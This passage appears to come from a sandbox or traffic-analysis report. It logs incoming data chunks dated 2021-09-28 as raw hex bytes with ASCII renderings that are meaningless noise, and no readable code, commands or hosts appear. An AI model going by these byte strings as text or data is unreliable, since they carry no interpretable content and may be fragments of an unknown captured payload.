                                                                        2021-09-28 06:15:57 UTC178INData Raw: 88 33 69 7a 01 c2 0d e3 c6 58 5c b9 2d dd d6 00 a8 54 06 01 f1 ac da fe 53 07 fc 1c 93 21 d5 6c 98 87 48 cf bf e8 5a 5e 60 2e aa 20 d8 5a ea 37 13 94 c4 3e e6 38 7e f9 1f a9 41 d0 19 1c ac fe d1 a5 fb 5d 47 64 28 99 98 5c 9f c2 db 8c f1 45 a5 23 31 01 48 c7 8a 19 4b ab a6 db 93 9d 46 d8 fc 16 d7 40 2d 1d 28 8d 45 6e 12 11 68 64 a9 b0 02 67 d6 3f f4 f4 e3 5d cd 99 79 a6 44 8b 98 2a 25 34 c5 fe 69 e5 8c 59 08 0d 19 e4 99 3f a7 e2 dd cf b4 09 32 ff e5 07 16 04 d9 4b 08 b0 55 30 d8 c8 cd 50 21 01 36 39 cd cf 12 dd bd da 04 f3 34 5d 97 88 74 3e 69 0a 6d 57 ea 55 f2 80 9e b2 9d b9 a7 d3 3e 5a 89 b4 27 d3 a9 f5 02 54 20 79 16 fa 06 89 26 ac 07 86 57 de e2 b8 d8 20 6d 83 f5 5f 3d ae ab dc 95 9f 7a 14 f7 c2 66 1f fc d3 5e 5e a6 de 79 0f d1 d6 fd d5 cb 98 6b 6b cc
                                                                        Data Ascii: 3izX\-TS!lHZ^`. Z7>8~A]Gd(\E#1HKF@-(Enhdg?]yD*%4iY?2KU0P!694]t>imWU>Z'T y&W m_=zf^^ykk
                                                                        2021-09-28 06:15:57 UTC179INData Raw: a7 6b 86 10 76 f9 df d5 70 c6 47 10 27 23 68 02 90 da 60 a0 a7 8d 25 0f 5b 26 35 9e 98 7c 99 4f 19 bc fc 41 4a 2b 6a 46 b9 0a 8b 97 b6 85 c0 d1 e3 8e bc 1a 8b 82 ae 17 11 bb ea 31 72 81 84 08 1b d0 42 99 b0 1b 6e 33 3f 48 0d ae d0 f7 5f d0 3c 41 34 e2 ff e7 55 e6 50 9f 2c 0b 75 ed b9 60 42 c3 62 3b 86 fa 81 eb 11 c9 f0 35 50 e0 b7 89 79 f9 30 8b a0 89 5f 86 2e 1b 0d 93 c8 e4 2a 5e a3 9b 88 71 93 17 bd d1 1d ee 34 e5 4c 0b 5c d9 72 22 6b 65 14 a0 53 cf 17 62 c1 8e 74 79 9b 23 0e e8 06 98 f5 12 38 00 da 2d 4b 3d 9c f9 92 8a 77 f5 b1 fb 0f ea d3 4e a7 5d 44 04 36 a7 ed 10 98 0c 31 e3 a0 be f2 98 91 e6 e3 52 3c 80 f7 9c 94 2a d4 5e 30 82 d1 47 14 40 24 08 d1 48 52 72 b2 5f 73 58 dc cd d2 64 28 27 ca 58 bf 4b 24 0c 61 46 39 48 b1 84 31 0d 24 68 33 77 2e 8e 21
                                                                        Data Ascii: kvpG'#h`%[&5|OAJ+jF1rBn3?H_<A4UP,u`Bb;5Py0_.*^q4L\r"keSbty#8-K=wN]D61R<*^0G@$HRr_sXd('XK$aF9H1$h3w.!
                                                                        2021-09-28 06:15:57 UTC180INData Raw: 3f 40 32 d8 c8 5b c6 1d 0c d4 dd b2 b2 d0 31 a8 d8 04 f3 a2 cb bc 80 89 da 16 77 8e 9a ff 57 f2 80 08 24 8c ed 45 37 41 27 8c 9e 3d d1 a9 f5 94 c2 75 9e ef 1e 79 f4 01 a5 1d 84 57 de 74 2e 42 88 8f 67 8a 22 75 c6 b1 de 95 9f ec 82 88 cf a1 fb 83 ae 34 18 bc dc 79 0f 47 40 09 25 29 7c 14 16 47 a3 49 5c 93 5e 0b 74 74 f1 66 fc 30 9a c2 04 5f 1b 0e ed 0c 49 01 54 44 cd 76 b1 ad ae 06 49 a8 2f 67 6b d1 0d 79 7f 1a 3d 81 9e 7f 95 22 1a 04 1e 55 1f 5c 32 7f 2f e6 f5 8e 0e 08 0d 98 52 a7 67 7c a5 98 aa d1 3d 44 d7 82 17 03 d8 7a 3d af 90 6a 6a be 8f b5 87 06 b2 19 8b 77 62 fc 23 b4 47 2a ce d9 99 74 cc 13 aa ae 3a ea c1 95 49 8e 89 2a 48 06 64 19 6e 6c db a3 76 8d 27 0f a8 72 ad 52 7c 47 4a 10 5a 59 9d 26 12 59 f5 6c 8a 90 67 23 9c c1 5c 4d 61 f6 9c 11 04 4e 18
                                                                        Data Ascii: ?@2[1wW$E7A'=uyWt.Bg"u4yG@%)|GI\^ttf0_ITDvI/gky="U\2/Rg|=Dz=jjwb#G*t:I*Hdnlv'rR|GJZY&Ylg#\MaN
                                                                        2021-09-28 06:15:57 UTC182INData Raw: 7b 9b 23 98 7e 0a 76 06 f6 47 7d 30 e1 6a 3f 9c f9 04 1c 0a 92 54 1f 70 97 d8 6d 81 5f 44 04 a0 31 d0 fb 68 e8 4e 9e 8c bf d4 9a 91 e6 75 c4 c8 d0 12 78 eb 57 99 39 16 80 d1 47 82 d6 43 26 20 ac 2d 0f dc 1a 55 5a dc cd 44 f2 8c ab 2f bc c0 36 ab 97 47 44 39 48 27 12 a0 5d d5 8c 4c 0a 9e 77 07 de c2 6b be 94 c9 ac cc c4 cd a0 40 00 10 45 43 f4 20 8d 8e d7 fa 7b 81 20 d5 b7 85 c3 e9 6c 6c 1d 78 68 cb 06 19 bb 3c 54 65 54 aa 29 e9 3c 83 39 28 66 7d 33 72 0f 49 5b 2e 7b a5 2f 91 6c c6 d5 99 08 3c 35 c8 dc eb 3b fc 09 a4 48 8f 48 6a c0 74 df c4 ce 5c 51 ae 3b fe 4f 4e 04 6d 03 6b 90 d8 68 53 47 69 fa c9 5a 33 1a f3 85 f4 f3 bd 7e 5a b5 e0 c8 84 6e 3e ce 81 35 ce a8 c6 a8 e6 4c eb 1f 9f d2 a7 65 72 1e 53 c2 d3 33 fb 75 c6 82 dd d0 7e 87 f4 c0 fa b1 f3 d3 a5 bd
                                                                        Data Ascii: {#~vG}0j?Tpm_D1hNuxW9GC& -UZD/6GD9H']Lwk@EC { llxh<TeT)<9(f}3rI[.{/l<5;HHjt\Q;ONmkhSGiZ3~Zn>5LerS3u~
                                                                        2021-09-28 06:15:57 UTC183INData Raw: 08 9b 0e 7f 6a 80 98 da e5 b4 a5 0f 46 d7 82 81 95 eb 28 dc 4b ef 17 2a ac bd b7 87 06 24 8f 4a 72 86 18 5c c9 26 1b fc db 99 74 5a 85 f7 7d db 0e be e8 ca 5e bb 28 48 06 f2 8f ed ec 3f 47 09 f0 82 f0 9a 70 ad 52 ea d1 db 11 b6 bd e2 5b d5 c7 c7 6e 8a 90 f1 b5 77 29 b8 a9 1e 8b 75 ad 36 4c 18 12 5a c4 6a 8a 19 f1 11 20 3c 0c db a0 c2 a3 76 d7 1e 8b 0d 70 96 25 2f b3 ca d8 c1 4b f3 54 f4 cc 14 10 ae b5 0e 6e c1 ac 44 b2 e1 41 99 1b d3 23 44 b6 5c 29 4f 8d de 6d da 2c 5f e3 44 2e b5 38 bc 11 0c b8 7a 26 f4 00 90 44 41 08 d9 12 c4 b1 dd 43 70 17 d0 f6 65 5b 8e 83 cf d8 b3 e8 a5 1b 25 5c ca c0 c0 c4 7e db c6 4d ed f4 fe d7 4a 37 fe a0 d1 72 6d 53 e9 87 d6 98 e1 18 bc ce 1a 64 0b 47 f7 5e b5 33 4a c8 86 9e 1b 48 d6 7f 26 63 88 39 61 4a 54 e7 d2 61 5f d2 a0 a7
                                                                        Data Ascii: jF(K*$Jr\&tZ}^(H?GpR[nw)u6LZj <vp%/KTnDA#D\)Om,_D.8z&DACpe[%\~MJ7rmSdG^3JH&c9aJTa_
                                                                        2021-09-28 06:15:57 UTC184INData Raw: 33 3f ad bb 22 aa e4 43 38 0b ca dc eb ad 6a a7 9e a8 6b 37 17 ac 5e e1 c6 ce 5c c7 38 01 d7 9b aa 7b 10 8e a2 ae da 68 53 d1 ff f5 87 ba d7 65 8e 2a 1b cd bf 7e 5a 23 76 a6 ab bb da b1 fc e4 40 96 c4 a8 e6 da 7d 10 0a 32 43 1a 0f ec ff fc d1 33 fb e3 50 1a 29 02 9a f8 89 d3 8f 8e f1 d3 a5 2b 32 ab 5d 5c 88 9f 5d 9c f2 d9 93 0b 46 1c eb 32 d6 db 2f 7d 3f d9 11 6c 12 87 68 3a aa ec 17 fc d4 7c e3 8e b7 5f cd 0f 79 e2 53 61 9e b1 27 16 d2 66 3d e7 8c cf 08 89 1d 32 82 a4 a5 1f ca 71 e0 0b 32 69 e5 42 0f d4 df d0 0a 6c 42 ec 8c ca cd c6 21 ab 32 1b d5 54 10 62 aa d8 51 f1 34 cb 97 10 6f b8 6f 91 6f c9 fd 76 a7 82 9e 24 9d 49 a3 95 27 c1 8b cc 3f 92 fc f7 02 c2 20 0e 09 88 00 12 24 f7 1f e0 02 dc e2 2e d8 2c 69 8b d7 c4 3f 94 b3 5b c0 9d 7a 82 f7 5f 47 47 fa
                                                                        Data Ascii: 3?"C8jk7^\8{hSe*~Z#v@}2C3P)+2]\]F2/}?lh:|_ySa'f=2q2iBlB!2TbQ4ooov$I'? $.,i?[z_GG
                                                                        2021-09-28 06:15:57 UTC185INData Raw: 56 00 a0 51 c8 bc 73 5b 0e b8 7a b0 62 c3 11 86 a5 77 a4 b4 29 fb df 43 70 81 46 b7 22 b8 6a fc b2 1f 3f a2 a7 1b 25 ca 5c d3 35 05 9a a4 bb a5 46 be fc d7 4a a1 68 d7 bc 91 89 2c 94 8d a0 d3 e3 18 bc 58 8c e1 ae 8c 13 21 c8 1f 12 83 84 9e 1b de 40 5d bb 80 6c 46 1c 04 6d ac d0 61 5f 44 36 1b 34 79 fd b0 76 94 30 9d 2c 9d 75 b9 a3 b3 65 38 62 0a a5 f8 81 ea 11 59 d1 08 44 07 b5 f4 79 87 03 88 a0 89 5f 00 3e f5 0f 75 ca 89 3a cd 80 99 88 61 83 85 bd 56 09 08 16 98 4c b9 7f db 52 20 6b f3 14 b8 70 28 15 1f c1 5b 77 79 9b 23 0e 6e 16 71 e0 f4 3a 7e fa d9 68 3f 9c f9 b2 18 77 b6 b2 1f 0d 94 d3 56 83 5e 64 00 36 31 ed fc ae ee 33 9e a0 94 c6 99 91 e6 e3 d4 2c f4 f4 7a 96 47 c4 06 14 80 d1 57 04 d5 24 23 c6 be 40 0c b2 21 57 4a cc c9 d2 f2 28 86 e9 bf bd 36 24
                                                                        Data Ascii: VQs[zbw)CpF"j?%\5FJh,X!@]lFma_D64yv0,ue8bYDy_>u:aVLR kp([wy#nq:~h?wV^d613,zGW$#@!WJ(6$
                                                                        2021-09-28 06:15:57 UTC187INData Raw: 41 2e 63 1f e9 fd 08 a3 68 4b df 65 e1 62 37 80 01 c6 31 19 c9 b1 ee aa 3e ab de a3 9a 83 1c 33 d9 88 e0 ca ca 0e 87 9b f7 f3 74 f4 b5 12 7b 0c 81 07 25 ea f6 3b 36 a5 26 1d b8 ff d1 30 f4 33 ec e0 98 90 1d 59 e4 bb 89 ce 85 1f c1 ab 2f 79 bb 96 7c 54 21 8c e8 9c fb 3c 9c cb 83 a6 c0 0e f8 27 af 31 27 ad dc d8 0e 43 56 39 12 2e 7f 46 33 04 8f 2a 5d 9b 7d 4e 77 92 f1 96 f6 95 99 8f 2a 88 0b ee ee ab 48 f4 44 44 cd c2 b1 4c ae f0 4a a9 2d de 4e 60 0c 96 7f 48 18 ae b1 7c 97 26 17 db 1f 7c 1a 99 1d 0c 2b ee c7 9b 2b 1c 09 2f 50 da 48 80 a3 cc a8 8a 1e 66 d3 a3 15 d5 e8 09 3e 48 90 db 59 c2 bb 8e 85 e2 a5 a2 8f f9 61 b4 2a fb 43 1d fc 55 90 43 c8 e4 ab ff 28 31 c7 21 49 8b 93 70 4c cf 64 e2 63 be d8 8c 74 13 20 99 99 b9 ad ff 71 8c 4e 5c 52 69 b6 2b 16 c9 c7
                                                                        Data Ascii: A.chKeb71>3t{%;6&03Y/y|T!<'1'CV9.F3*]}Nw*HDDLJ-N`H|&|++/PHf>HYa*CUC(1!IpLdct qN\Ri+
                                                                        2021-09-28 06:15:57 UTC188INData Raw: bd e7 e8 39 28 72 f7 3b 9c ec 2d 24 1b e2 4c cb 71 ba 27 21 5b ba 77 71 f5 10 6e 79 d1 41 3b b3 dc 81 1c 4e b2 9d 38 1e 97 9a 52 26 6d f8 00 67 35 5b fb 32 ee 62 9a fe 8e 1a 90 c0 e2 21 d0 ef fd a5 7e d2 72 0e 08 7d 84 54 50 f4 dc 65 27 e9 8b 43 0f e3 25 f2 68 60 c9 43 f3 02 95 c3 b5 8c 37 cb a0 9e 46 08 49 25 33 0d 53 9a 8e 78 03 11 47 14 df d4 47 ed 91 43 9d 78 c9 f8 ab e0 3f 81 76 a3 fd 3a 8d 68 f7 0f 79 e5 24 09 a9 94 c3 c8 68 d5 38 7e 59 1c 00 95 a8 07 69 eb 54 87 21 bf 37 c1 3c 39 64 e0 38 4d 37 d3 68 c9 70 b2 2b 81 78 e0 d7 65 0c 16 1f 0e df c2 3a e0 07 92 42 40 4b d1 e7 1d e8 ff cc 48 63 9f 33 65 7c 87 23 d0 03 b0 ad 4e 4c 0a 4b 6e fe 4b 71 b2 14 e7 86 1e e3 3f 72 ab b7 d4 d2 38 51 31 ce f7 1b bb 91 65 ac b3 7c eb 13 b4 d4 9b 4a 91 12 05 fa 9b 39
                                                                        Data Ascii: 9(r;-$Lq'![wqnyA;N8R&mg5[2b!~r}TPe'C%h`C7FI%3SxGGCx?v:hy$h8~YiT!7<9d8M7hp+xe:B@KHc3e|#NLKnKq?r8Q1e|J9
                                                                        2021-09-28 06:15:57 UTC189INData Raw: 74 99 39 ab 92 3f 74 06 a1 cc 02 00 d2 d6 8c 0a 09 22 2b 2a 74 9a 9a 8a ed 28 e5 f1 46 05 ac 39 94 89 2d de 47 ae 14 96 eb 3c ad 0e 00 b6 8e 1c 69 c1 1d 25 c8 d0 5d 63 dc 9d 75 5b 84 4a 78 6c 08 87 cd 65 0c d0 2c d1 11 fe 94 ef f1 f6 60 67 f0 ae b1 39 7c e4 53 ed d7 65 30 90 bf 0e 5d b3 8c 8c 6f 7b 90 45 bd 32 12 c7 ad 4c ae 8f ea ad 4a a0 30 01 df 48 88 f5 e7 b8 3b 9f 42 1f bb c9 bf 51 d1 02 8f 1a 70 42 23 99 e8 d9 c4 90 4f 9b 47 3f c9 e3 14 30 92 0d 3a 92 a8 d9 80 c6 45 ab 3e 9a 24 88 b2 8b 67 62 a8 8a 71 6d 2d 7f c3 62 2c e9 39 8c 72 2b bc b3 20 a4 0e 38 63 86 0b 4b 34 64 e4 fe 42 9f 31 5c eb dc 5e 65 a6 69 da c1 a6 88 3e 36 5c 35 c0 65 d0 ed c4 4a 4d a9 b3 86 ca 8e 37 47 85 a8 77 3a 50 26 89 89 d0 27 18 4a fc b5 6e 68 6a 3c 54 08 38 fe 81 08 84 db 43
                                                                        Data Ascii: t9?t"+*t(F9-G<i%]cu[Jxle,`g9|Se0]o{E2LJ0H;BQpB#OG?0:E>$gbqm-b,9r+ 8cK4dB1\^ei>6\5eJM7Gw:P&'Jnhj<T8C
                                                                        2021-09-28 06:15:57 UTC191INData Raw: ac 75 7e 13 55 2f ce 5d 03 d3 6f a8 62 62 2d 06 25 01 af 64 23 64 f7 ab 42 55 cb cb ce fc 6d 6d 8b e7 47 da 17 a4 0c a3 f6 eb 58 50 3c 96 fc 59 a9 7f 14 a6 c3 10 de 59 57 64 e9 1a 9b 3d d4 32 9d 9e 62 7e bf 54 41 b8 74 c9 a0 d5 c8 f0 d6 e4 13 12 d1 e1 e7 9d 7d 30 38 14 41 e6 0e ea a3 a0 d2 6a fa 0f 40 dd 00 fd 90 aa ac d3 db ad f9 fc 80 ae 32 ab 4b ad af 25 5a c5 a7 72 bd 9b 46 9b ea 7b cd 5a 2b 11 3e af 69 ab 17 eb 69 ec 9a 73 04 7b d4 16 e9 1c e1 2c c8 8c 63 03 78 bc 98 cf 16 23 fe d5 61 ca a9 0f 08 6b 1c 95 9a a2 a6 16 cb 5a b5 a8 35 1d e4 43 0e 7f dc 57 08 46 70 bd f4 f1 c5 e9 04 a5 31 9e c7 9d 37 0c aa 91 0c dc 11 0b 97 88 6f d5 6b 77 6d ba fd 46 f2 80 9e 36 9d ca a3 09 3e 2f 89 a8 3f ed ab fb 02 ef 20 98 09 14 04 b1 26 75 16 8a 57 97 e2 48 d2 b8 69
                                                                        Data Ascii: u~U/]obb-%d#dBUmmGXP<YYWd=2b~TAt}08Aj@2K%ZrF{Z+>iis{,cx#akZ5CWFp17okwmF6>/? &uWHi
                                                                        2021-09-28 06:15:57 UTC192INData Raw: 76 6a fa 7f 35 61 38 a5 32 7c 4d ed df 7e 4c 31 50 86 a3 07 c8 7d 2c d9 0f 93 7a 63 62 a0 11 4b a7 4f a4 d2 77 d2 df 06 70 d7 47 e5 25 43 68 61 b3 f3 60 e5 a7 1b 27 4f 5c dd 37 e3 9a f2 bb 08 19 9f fe 0c 41 72 68 80 b8 6c 89 14 94 46 c3 3a e3 02 be 2f 8f 8f ac 42 13 bf cc e8 79 c4 84 5d 1e e3 52 3a b2 cf 69 48 0b 49 0f 67 d7 12 48 d1 34 4e 31 ec e8 ce 74 ed 58 ec 3b 9e 77 6b b1 05 40 fb 62 53 a9 33 93 ae 11 9f e7 19 49 43 b5 74 4b 34 01 47 80 29 6d b3 3c 2f 2f 7a ca d4 22 df 80 ce 80 62 93 e1 b5 43 09 68 3e 81 4c 4c 77 c0 72 da 63 ec 14 41 58 08 15 01 c8 75 57 2c 93 12 0e 29 0e 40 e0 a3 32 4a da c5 61 06 9c e7 9b 27 77 a8 bb 20 0d 89 da 69 83 41 4d 49 36 66 e5 b1 8e bd 3b cf a0 d3 de c9 91 b1 eb b0 3c 0f fc 0c 96 af dc 80 14 a6 df b1 16 c8 2d 39 c5 b0 59
                                                                        Data Ascii: vj5a82|M~L1P},zcbKOwpG%Cha`'O\7ArhlF:/By]R:iHIgH4N1tX;wk@bS3ICtK4G)m<//z"bCh>LLwrcAXuW,)@2Ja'w iAMI6f;<-9Y
                                                                        2021-09-28 06:15:57 UTC193INData Raw: 6d e7 57 34 6b d0 fc 17 e5 9f cf 09 1f 62 02 88 42 a5 62 d4 cc a1 09 33 69 fa d5 1a e2 d9 36 28 10 55 32 d9 c8 ec c7 36 3d 30 df ed b3 0b 1f ab d8 27 f2 2d cb 95 86 4b d9 70 77 6c b4 d8 56 e9 80 9c 24 bb de be 35 3d 27 ae b0 22 d1 ab f5 2a c3 3f 98 08 1c 2d f5 39 8a 1d 84 7d df c3 2e d9 ba 42 64 d6 22 3f e9 9d df b6 9f 7b 82 d8 c8 64 f9 fc ae 6e 36 9b dc 78 0f e0 41 d8 11 cd 7e 5b 17 eb 8c 4a 5c a0 5f ba 74 39 f0 b4 ff 64 9a 6f 2b 68 1a 27 ed 98 49 9b 53 89 cf 0a b1 54 80 2f 49 aa 2f c9 6a 5e 0c 9e 7d 5e 3c 43 b1 7f 95 18 1b bd 1e 74 18 81 31 2d 2f f5 c5 b0 0f 39 0d 0f 52 4e 67 ab a7 e7 aa dc 0c 75 d7 83 17 aa d9 1f 3a 4b 92 57 6b de bf b6 87 47 b3 ba 8b 6a 60 58 20 fe 47 5d fe 98 98 43 cc 87 aa 3d 3c 35 c3 e9 49 5c b8 11 48 04 64 c6 6f cc d9 44 74 ba 26
                                                                        Data Ascii: mW4kbBb3i6(U26=0'-KpwlV$5='"*?-9}.Bd"?{dn6xA~[J\_t9do+h'IST/I/j^}^<Ct1-/9RNgu:KWkGj`X G]C=<5I\HdoDt&
                                                                        2021-09-28 06:15:57 UTC194INData Raw: c1 a3 e5 65 13 d8 dd c2 e6 3d 7d 67 1d ab 41 39 0e f1 ad 08 d0 6c fd 0f 56 c8 2d be 9f e4 8e af dc 3c f6 02 a2 97 3a d6 40 ff 81 f1 4d 8e b6 a2 81 45 55 14 ff 58 c1 8b 39 c4 2b 5d 51 b2 06 75 7c a4 bf 39 1b 67 cd 8d fd e6 c3 66 ed 4f 59 4f 70 6a be c7 00 c1 fa 4d 41 30 a4 d4 21 b4 34 32 b0 21 8b 62 cb e8 b4 c3 12 6b e5 94 0e c5 db 38 14 14 42 76 d9 af cd fb 2d 3c 32 9c ce d9 12 78 ab d9 04 b0 35 a6 97 87 69 d9 6b 77 6c cd fd 07 c3 82 9e 24 9c a4 a3 a7 0c 25 89 f7 3e ac a9 43 14 c0 20 98 08 63 04 55 36 88 1f 84 56 5f e2 ea ea b8 69 65 f6 a1 3d d8 94 d9 95 9f 7b 07 f7 50 76 fe fe ed 5f b0 be 36 7e 0d d1 03 fc 98 cf 7e 59 15 cc cf 4a d7 93 d3 ac 77 3b f0 81 4d 4d 4b 64 23 5d 58 0f 58 9a ca ac 53 a2 cf 0a 70 63 7d 29 4f a8 2f f0 a8 73 e0 b2 7b 67 3d 6f 74 7d
                                                                        Data Ascii: e=}gA9lV-<:@MEUX9+]Qu|9gfOYOpjMA0!42!bk8Bv-<2x5ikwl$%>C cU6V_ie={Pv_6~~YJw;MMKd#]XXSpc})O/s{g=ot}
                                                                        2021-09-28 06:15:57 UTC195INData Raw: c6 e2 a1 b5 b6 51 d2 ba bd 52 ac 3e 7e 09 81 5d 06 b0 b2 9e 49 2d 21 1b fb 08 1a 0a 2a 4a 59 c1 99 0f 2b e3 00 a7 7e d2 be 8e 25 ac 11 ad 19 ab 75 4f de f2 1f eb 36 31 9d f8 bd a6 7e 3b 85 66 21 38 b5 b6 38 97 50 c8 a0 cd 1e 10 6b b5 0f 33 8b 99 6d 8f 80 d1 c9 71 f2 c0 bd 34 48 08 55 d9 4c dd 3e db 35 47 1f be 7b dd 25 45 70 59 a8 36 32 35 fa 4e 6b 3f 06 15 a1 f4 5d 3c da b3 29 3f db 9c e6 4a 18 da c7 70 68 de bd 30 ec 2d 29 65 42 58 82 90 cf ea 71 dc a0 c7 94 9a d5 a4 e3 81 7e f7 b2 38 96 10 96 02 5c c2 d1 26 56 d6 46 61 c6 cd 12 0f d6 63 57 3f 9e cd b4 b0 28 e1 8b be d5 74 24 e4 08 05 7a 48 f3 51 31 1b 70 8e 75 49 2e 09 46 de 84 28 28 d3 61 9c 62 85 b0 c1 d2 3b 68 37 05 a0 d7 d4 11 b6 76 32 a8 67 4b c0 e6 ba b0 0f 9b 57 2e 0f 5b 65 25 ce 4b 00 2d 38 c8
                                                                        Data Ascii: QR>~]I-!*JY+~%uO61~;f!88Pk3mq4HUL>5G{%EpY625Nk?]<)?Jph0-)eBXq~8\&VFacW?(t$zHQ1puI.F((ab;h7v2gKW.[e%K-8
                                                                        2021-09-28 06:15:57 UTC196INData Raw: d1 ee ad 02 8a 78 98 68 44 04 96 7e 8a 7c dc 57 ba ba 2e bd e2 69 03 af 22 5a b1 b3 9c cc 9f 39 db f7 8d 1e f9 bb f7 5e 71 e7 dc 3e 56 d1 08 a4 11 ae 27 69 74 95 8c 28 05 93 3a c4 74 5e a9 80 98 14 9a 09 72 5d 59 54 ed d9 13 ad 16 f8 cf 4e eb 63 c7 5e 49 ef 75 f1 23 29 0c fe 27 67 5f 34 b1 1e cf 22 7e c8 1e 10 42 ba 56 58 2f 90 9f 8c 69 6d 79 51 24 12 0a ef c2 ba f5 e2 7e 23 a3 dd 61 f4 b4 59 5f 16 cd 17 28 8a bf f4 e6 06 f6 ee 8b 2d 01 1a 67 a8 47 1b 9f db d1 15 cc e4 cb 79 5f 6d c3 8b 28 19 dd 49 48 63 05 8f 08 96 d9 22 15 f0 4f d6 98 17 c8 26 23 95 2b 61 31 bf ec 3e 66 df 81 0f fe f1 67 e5 ee 66 2a ce 00 ff f9 8e 70 2d 6c 73 cc 83 b4 fa b0 91 06 45 55 30 9d c1 b6 c2 e0 87 5f c5 81 17 88 51 47 9a bc b9 c1 1b 17 3b 61 ad 80 66 aa f1 22 52 a2 ac 06 d0 77
                                                                        Data Ascii: xhD~|W.i"Z9^q>V'it(:t^r]YTNc^Iu#)'g_4"~BVX/imyQ$~#aY_(-gGy_m(IHc"O&#+a1>fgf*p-lsEU0_QG;af"Rw
                                                                        2021-09-28 06:15:57 UTC198INData Raw: 81 86 c4 71 96 9d 16 db 32 a7 71 75 e7 b4 47 55 b2 40 71 a7 c0 37 6a b2 62 25 3f b8 a8 bc 86 41 e7 a5 fd dc 55 4c c9 45 01 57 2c f8 7c 47 37 58 eb 31 48 4b 2b 6c b0 8b 05 5e fb 49 f9 2a 81 d5 d4 d4 55 64 2c 31 9b d8 e0 22 bc 68 2f 9d 52 4f ed e5 af 8c 6c b3 58 03 2c 40 61 16 da 4b 04 02 54 e3 6d 16 4f 00 53 bd 05 62 5f 21 33 02 08 4b 09 5a 4e c2 34 5a b6 86 64 0e 09 9e b3 af 54 1f 6b e6 2b 69 2d 72 b4 52 ab a7 a0 38 3d 5d 3b 86 08 c6 72 79 6e 94 ea b3 0d 3f 23 b7 9b ff 38 b9 7d 8e d6 29 a9 da 36 3b db 12 a4 cd 5d 8a b9 92 41 7a f9 a1 fc 9f 3c 18 57 7c ba 25 0b 6a 1e fe 9b bd 56 9a 06 35 ca 4b 8a fc e9 ec c0 98 fe 94 b2 d1 d8 7a 86 24 de e6 87 5d ee c3 af c7 72 36 ef ad 82 ba 50 65 61 51 eb 29 0b 12 ef 09 c2 ce 3a 65 1a 84 64 80 82 82 33 aa 63 1c 74 17 02
                                                                        Data Ascii: q2quGU@q7jb%?AULEW,|G7X1HK+l^I*Ud,1"h/ROlX,@aKTmOSb_!3KZN4ZdTk+i-rR8=];ryn?#8})6;]Az<W|%jV5Kz$]r6PeaQ):ed3ct
                                                                        2021-09-28 06:15:57 UTC199INData Raw: e0 aa 31 49 78 b3 bf 2c 7b eb 4d 3b 76 0b e1 1d 92 d9 02 11 84 75 d2 eb 00 c2 3c 0f b4 4a 56 3c d0 ec 3e 12 c4 ac 1d fa ff 14 d0 9c 5d 2c d2 33 ea ee 99 51 4c 4a 77 ba a1 a3 fd 9a f3 2f 52 53 25 ad c5 c2 ee 95 bb 59 c3 88 13 98 51 47 9e a4 bd a6 2a 11 31 11 8f 97 66 98 d0 3a 44 ac cd 36 d6 24 35 9b 4e 50 21 7c d2 5b 15 22 ff 9c 1f 23 5b 23 87 c0 40 ad 6b 58 38 7a dd 7a 62 07 6c 75 14 c2 0a c3 77 02 a6 9c 22 1e 40 34 9f 51 3b 68 d5 da aa 05 c1 c3 48 51 3d 28 a9 54 a2 ec ad c9 24 7b c9 88 b2 4a 64 3c e1 ef 1f f9 34 f5 e3 81 a5 97 6a d5 ac f9 10 c9 6a 52 33 a5 43 1b ed e1 ec 5c 2d 2e 1a c0 07 1a 5e 78 0b 79 da a2 08 3d a7 42 c2 36 d8 8a a4 12 a5 24 eb 5e f4 17 5d cf e3 40 f6 07 1b d5 b3 e4 92 66 30 82 6e 05 72 c1 86 10 f5 66 fd c5 89 18 75 40 91 7d 14 be fc
                                                                        Data Ascii: 1Ix,{M;vu<JV<>],3QLJw/RS%YQG*1f:D6$5NP!|["#[#@kX8zzbluw"@4Q;hHQ=(T${Jd<4jjR3C\-.^xy=B6$^]@f0nrfu@}
                                                                        2021-09-28 06:15:57 UTC200INData Raw: c1 2e bc 6e ef f1 2d 9f cd 11 3c dc 1a ad fb 29 aa a5 92 52 13 d7 ab c5 96 2d 0f 7a 4e a0 33 0e 61 79 ac aa be 60 8f 07 39 ec 4d e4 df e0 fd 93 af fe 98 bd c2 bd 61 92 28 c9 fe 90 34 c7 c1 db c0 72 35 fe 8e 9d fb 79 5f 61 48 e6 2b 09 12 d3 07 f9 e6 39 6e 7d d6 55 8c ba 8c 33 aa 0f 1e 11 27 32 ff 39 44 09 be 99 25 8a eb cf 7b 7a 69 5d fe 2c c6 00 a6 a8 f8 66 55 69 82 b1 7b bd 96 45 6f 11 00 5a d8 8b a5 c6 65 55 32 9a a7 b2 54 77 aa 9f 6c f3 7c a3 97 e7 07 d8 09 1f 6d f9 9c 23 91 e8 9e 40 f5 df c6 5d 3c 41 e1 b1 58 b9 a9 92 67 b6 7f c8 68 6f 77 83 49 f8 7b cc 36 ad 8a 2e 9b d5 04 15 82 56 58 a1 d2 ad fd 9f 3c ee 82 ba 2f f9 b3 cf 2a 5f be bb 1c 7b 8e 05 85 74 ac 0b 1d 77 ae e0 2e 0c f2 2a f5 74 7c 95 f4 b8 38 f6 02 7b 3c 6f 66 ed dd 2c d9 06 c7 a2 7b e1 02
                                                                        Data Ascii: .n-<)R-zN3ay`9Ma(4r5y_aH+9n}U3'29D%{zi],fUi{EoZeU2Twl|m#@]<AXghowI{6.VX</*_{tw.*t|8{<of,{
                                                                        2021-09-28 06:15:57 UTC201INData Raw: f5 d9 d8 20 19 d8 91 d7 2d 52 1c ff f2 03 ee 3c 94 f4 a5 a5 bc 51 c8 ab e1 64 fa 0b 64 30 bc 74 17 f5 cd ea 7e 25 40 18 d7 12 31 7d 75 26 68 fd a9 12 2b b7 5b a7 79 ef 9a bf 17 90 39 f1 4b ce 0c 5b cf e3 2d be 04 1a a5 9f ec eb 42 26 9d 67 21 72 c7 9d 1a d6 7f ee cf fb 36 64 46 99 0f 3d ab ea 42 8f ec fe e7 03 fa f5 d5 3b 09 44 62 ea 25 d4 7f 89 13 4c 0f 9c 79 b9 19 6a 67 66 b1 2e 38 2f e9 42 60 0d 60 1c 92 99 3a 38 b4 ae 05 3f de 97 92 5f 19 b6 f6 73 0d d2 bd 56 c5 31 44 43 58 31 a5 90 8e be 5c dc cf eb ba ff f0 88 e3 8d 4f bb 9d 0e e2 3b b1 47 7a e4 b8 26 7a d6 46 4d c6 cd 3e 0f d6 4f 57 16 b9 a3 d2 95 4d f2 96 ed de 44 41 c9 2b 44 7a 27 c1 6b 77 2a 5c e3 62 69 5c 29 60 b0 c2 0c 4d e0 7d c9 59 a3 c2 f4 fe 50 77 2b 43 